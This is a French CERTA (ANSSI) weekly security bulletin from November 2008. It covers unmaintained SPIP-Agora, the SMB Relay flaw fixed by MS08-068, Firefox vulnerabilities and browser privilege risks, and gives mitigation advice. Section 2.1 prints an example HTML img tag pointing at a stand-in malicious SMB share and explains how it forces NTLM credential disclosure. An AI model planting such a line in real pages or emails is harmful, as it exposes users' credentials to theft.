S . G . D . S . N Agence nationale de la sécurité des systèmes d'information

Paris, le 14 novembre 2008 No CERTA-2008-ACT-046

Affaire suivie par :

CERTA

Objet : Bulletin d'actualité 2008-46

Gestion du document

Le bulletin d'actualité est disponible dans son intégralité et au format PDF à l'adresse suivante :

http://www.certa.ssi.gouv.fr/site/CERTA-2008-ACT-046.pdf

Un extrait du bulletin, ne reprenant que les articles de la semaine, se trouve en HTML à l'adresse suivante :

http://www.certa.ssi.gouv.fr/site/CERTA-2008-ACT-046/

1 Logiciels obsolètes : danger

1.1 Cas général

Le CERTA recommande vivement à ses lecteurs de mettre à jour les logiciels qu'ils utilisent de manière à diminuer les possibilités d'attaques contre leurs systèmes d'information.

Au cours du temps, des logiciels ou des branches de développement de logiciel ne sont plus maintenus. La réponse à des vulnérabilités ou à des attaques ne sera plus fournie par l'éditeur ou la communauté en charge de la maintenance. Sauf à maitriser parfaitement un tel logiciel et à être capable d'en assurer lui-même la maintenance, un utilisateur de logiciel non maintenu doit migrer vers des logiciels maintenus pour conserver un système qui bénéficie de réponse aux vulnérabilités publiées et aux attaques.

Le CERTA tient une liste (non exhaustive) de logiciels avec les versions maintenues et non maintenues dans la note CERTA-2005-INF-003 (voir documentation). Le plus sûr moyen de connaître l'état de maintenance d'un logiciel est de consulter le site de l'éditeur ou du projet (logiciels libres).

1.2 Actualité

À l'approche de la fin de vie du projet, les développeurs de SPIP-Agora ont encouragé la migration des sites des utilisateurs vers d'autres gestionnaires de contenus, SPIP en particulier. Un script PHP d'aide à la migration vers SPIP 1.9.2 est même fourni (voir documentation).

Malgré cet effort, des sites en exploitation restent contruits autour de ce logiciel.

D'un autre côté, des vulnérabilités du logiciel SPIP-Agora continuent à être publiées. La publication de vulnérabilité de la fin octobre 2008 affecte la dernière version stable du logiciel SPIP-Agora. Elle est de type PHP include. Il n'y aura pas de correctif. Les sites qui sont restés en SPIP-Agora sont vulnérables.

Il est donc important, dès lors que le logiciel est utilisé sur un système d'information relié à l'Internet :

• à très court terme, de prendre les précautions usuelles contre ce type de vulnérabilité (filtrage entrant et sortant, configuration de PHP...), voire de déconnecter le site ;
• pour les utilisateurs en ayant la capacité, de corriger le logiciel ;
• à moyen terme, de migrer le site vers un autre gestionnaire de contenus.

Ces actions doivent, bien entendu, s'inscrire dans la politique de sécurité du système d'information.

Il ne faut pas oublier, dans l'évaluation des risques qui sous-tend cette politique, qu'un site qui ne comporte aucune donnée qualifiée de sensible reste une cible pour un cyber attaquant. Il pourra vouloir utiliser les ressources matérielles du serveur pour mener d'autres attaques en faisant porter le chapeau au possesseur légitime de la machine vulnérable ainsi détournée.

1.3 Documentation

• Note d'information CERTA-2005-INF-003, « Les systèmes et logiciels obsolètes » :

  http://www.certa.ssi.gouv.fr/site/CERTA-2005-INF-003/
  

• Site du projet Agora :

  http://www.agora.gouv.fr/
  

• Script de migration d'Agora vers SPIP :

  http://www.agora2spip.agora.gouv.fr/Le-migrateur-Agora-Spip-un-outil.html
  

• Alerte CERTA-2003-ALE-003, « Exploitation massive de la vulnérabilité « include PHP » :

  http://www.certa.ssi.gouv.fr/site/CERTA-2003-ALE-003/
  

• Note d'information CERTA-2007-INF-002, « Du bon usage du PHP » :

  http://www.certa.ssi.gouv.fr/site/CERTA-2007-INF-002/
  

2 Retour sur le correctif MS08-068

2.1 Présentation

le CERTA a publié l'avis CERTA-2008-AVI-549 suite au bulletin de sécurité Microsoft MS08-068. Celui-ci corrige une attaque nommée SMB Relay qui profite d'une erreur dans la mise en oeuvre de l'authentification par SMB/NTLM (NT LAN Manager). Le principe est le suivant :

• le client SMB est amené à se connecter à un service SMB distant contrôlé par une personne malveillante. Cet accès peut être forcé en incitant la victime à accéder à une ressource distante par exemple. Il est possible d'imaginer une page Web lue par Internet Explorer ou un message électronique au format HTML visualisé dans Outlook avec une ligne du type suivant dans le code :

          <img src="\\Machine_Malveillante\Share\logo.gif">
  

• le serveur SMB distant accepte les sessions authentifiées. Il peut forcer le client à le faire en rejetant sa session anonyme (NULL). Dans ce cas, le client transmet son nom d'usage, le domaine et le mot de passe de l'utilisateur connecté via les procédures NTLM ;
• durant la phase d'authentification, le serveur envoie une valeur aléatoire, un « challenge ». Le mot de passe qui est transmis par le client sous forme de condensat (hash) au serveur est donc en principe unique pour un mot de passe et une valeur de « challenge » donnée. Le client envoie en revanche son nom et le domaine en clair ;
• le serveur malveillant qui utilise le même « challenge » systématiquement peut effectuer une attaque par recherche exhaustive ou par table précalculée sur le condensat du mot de passe ;
• le serveur malveillant peut également utiliser ces mêmes informations d'authentification pour essayer de se connecter sur le poste client : le « challenge » que va demander le poste client peut également être celui que le serveur propose au client qui cherche involontairement à se connecter. En d'autres termes, le serveur demande au client ce que le client exige pour se connecter à lui. Il obtient cette information et peut alors se connecter et exécuter du code.

Cette forme d'attaque est aussi dite réflexive.

Le correctif de Microsoft mentionné dans MS08-068 protège du dernier point en vérifiant que le « challenge » reçu par un serveur SMB ne correspond pas à l'un de ceux que la machine vient de fournir.

Le correctif n'apporte cependant pas de mesure pour limiter les risques d'un relais SMB illégitime qui redirige correctement le trafic vers un serveur fonctionnel. Il reste donc envisageable de dérouter une phase d'authentification vers une autre machine locale et d'abuser d'un service autorisant NTLM comme authentification. Ce scénario reste possible quand des services s'appuient sur la suite Integrated Windows Authentication dans une zone de confiance.

Plusieurs mesures s'appliquent pour éviter ce genre de problèmes :

• mettre à jour les postes Windows avec le correctif décrit dans MS08-068 ;
• désactiver le partage de fichiers et d'imprimantes s'il n'est pas utile ;
• filtrer les ports 139 et 445 par une politique rigoureuse ;
• ne pas utiliser de comptes administrateur par défaut (bloquer les droits d'écriture dans ADMIN$ et les permissions pour manipuler les services Windows) ;
• avoir des mots de passe de comptes utilisateur robustes ;
• mettre en place des solutions de sécurité complémentaires (IPsec, signature SMB, etc.).

2.2 Documentation

• Avis CERTA-2008-AVI-549 du mercredi 12 novembre 2008 :

  http://www.certa.ssi.gouv.fr/site/CERTA-2008-AVI-549/
  

• Bloc-Notes Microsoft SWI du 11 novembre 2008 :

  http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx
  

• Bloc-Notes Microsoft MSRC du 11 novembre 2008 :

  http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-smbrelay.aspx
  

• Description de "SMB Relay" à tlantacon 2001 :

  http://www.xfocus.net/articles/200305/smbrelay.html
  

3 L'actualité de Mozilla Firefox

3.1 Présentation

Cette semaine, le CERTA a publié un avis faisant état de nombreuses vulnérabilités dans Mozilla Firefox. Parmi celles-ci, il est noté que des exécutions de code arbitraire à distance sont possibles :

• l'une de ces vulnérabilités est exploitable grâce à un manque de contrôle dans les tests de déchargement dynamique du module Flash. Il est possible via un fichier SWF spécialement conçu d'accéder à une adresse mémoire qui n'est plus affectée au module Flash et par conséquent d'exécuter du code arbitraire à distance. Cette vulnérabilité n'affecte que la version 2 du navigateur ;
• une altération de window.__proto__.__proto__object peut inciter le navigateur à placer un verrou sur un objet non natif. Le fondation Mozilla précise que cette vulnérabilité pourrait aboutir à une exécution de code arbitraire ;
• plusieurs erreurs dans le moteur du navigateur ont été corrigées, dont certaines présentaient des possibilités de corruption de la mémoire entraînant une éventuelle exécution de code arbitraire ;
• une erreur dans le traitement de l'http-index-format de MIME permet via l'envoi d'une réponse (HTTP index) spécialement conçue d'exécuter du code arbitraire à distance ;
• une vulnérabilité dans le code de construction des DOM (Document Object Model) Mozilla permet, dans certaines conditions, l'accès par le navigateur à des parties de la mémoire non initalisées. Une personne malveillante pourrait exécuter du code arbitraire à distance en utilisant cette vulnérabilité.

Le CERTA profite de cette actualité pour rappeler à ses lecteurs que, comme précisé sur la page de téléchargement de Firefox 2, le support de cette version devrait être arrêté vers la mi-décembre. Le CERTA recommande de passer directement à la version 3.0.4 de Firefox.

3.2 Documentation

• Avis CERTA-2008-AVI-555 :

  http://www.certa.ssi.gouv.fr/site/CERTA-2008-AVI-555/
  

4 Applications Web enrichies

On peut aisément constater que les navigateurs Web vont bien au-delà des fonctionnalités classiques que l'on attendrait de ce type de logiciels : l'affichage de pages HTML contenant éventuellement des scripts ou des images.

Depuis assez longtemps déjà, le navigateur, à la demande de certaines directives contenues dans les pages Web consultées, peut agir sur le système d'exploitation lui-même en lui faisant exécuter certaines tâches. À l'image de Windows Update et de ses contrôles activeX, on peut lancer une application tierce par le biais d'un appel présent dans une page Web.

Cette imbrication du navigateur dans le système d'exploitation croît au fil des améliorations et de nouvelles fonctionnalités qui apparaissent. Il est ainsi possible via un simple navigateur d'activer micro et webcam pour faire de la visio-conférence, et ce, par simple pression d'un bouton dans une page Web.

On peut voir l'apparition d'une convergence entre webmail, messagerie instantanée et maintenant visio-conférence dans une seule et même interface. L'utilisateur passe ainsi allégrement, par le truchement de quelques sockets réseaux judicieusement choisies, de la rédaction d'un courriel à la conversation en direct avec le destinataire.

Dans ce contexte, et à défaut de pouvoir se passer de toutes ces nouvelles technologies, il est peut-être bon de rappeler un vieux principe de l'informatique : le KISS (Keep It Stupidely Simple) ou autrement dit « garder le système le plus simple possible ». Moins on a de code dans une application, moins on aura, potentiellement, de bogues et plus l'application sera, théoriquement, facile à appréhender.

L'idéal est d'avoir une application par fonction et que ces applications communiquent entre elles de façon maîtrisée. Lorsqu'un navigateur peut, presque à loisir, activer une caméra ou un microphone, c'est qu'il a acquis d'une certaine manière des privilèges élevés sur la machine. Il est alors indispensable de connaître la façon dont cette activation a lieu et de la maîtriser sous peine de voir une page malveillante réaliser la même opération à l'insu de l'utilisateur.

5 Rappel des avis émis

Dans la période du 07 au 14 novembre 2008, le CERTA a émis les avis suivants :

• CERTA-2008-AVI-546 : Multiples vulnérabilités dans Adobe Flash Player
• CERTA-2008-AVI-547 : Vulnérabilité dans les produits VMware
• CERTA-2008-AVI-548 : Vulnérabilité dans HP Tru64 UNIX
• CERTA-2008-AVI-549 : Vulnérabilité de SMB dans Microsoft Windows
• CERTA-2008-AVI-550 : Vulnérabilités dans Microsoft XML Core Services
• CERTA-2008-AVI-551 : Vulnérabilités dans Joomla!
• CERTA-2008-AVI-552 : Multiples vulnérabilités du serveur DHCP de Sun Solaris
• CERTA-2008-AVI-553 : Vulnérabilité dans ClamAV
• CERTA-2008-AVI-554 : Vulnérabilités dans TYPO3
• CERTA-2008-AVI-555 : Multiples vulnérabilités dans Mozilla Firefox

Gestion détaillée du document

14 novembre 2008

version initiale.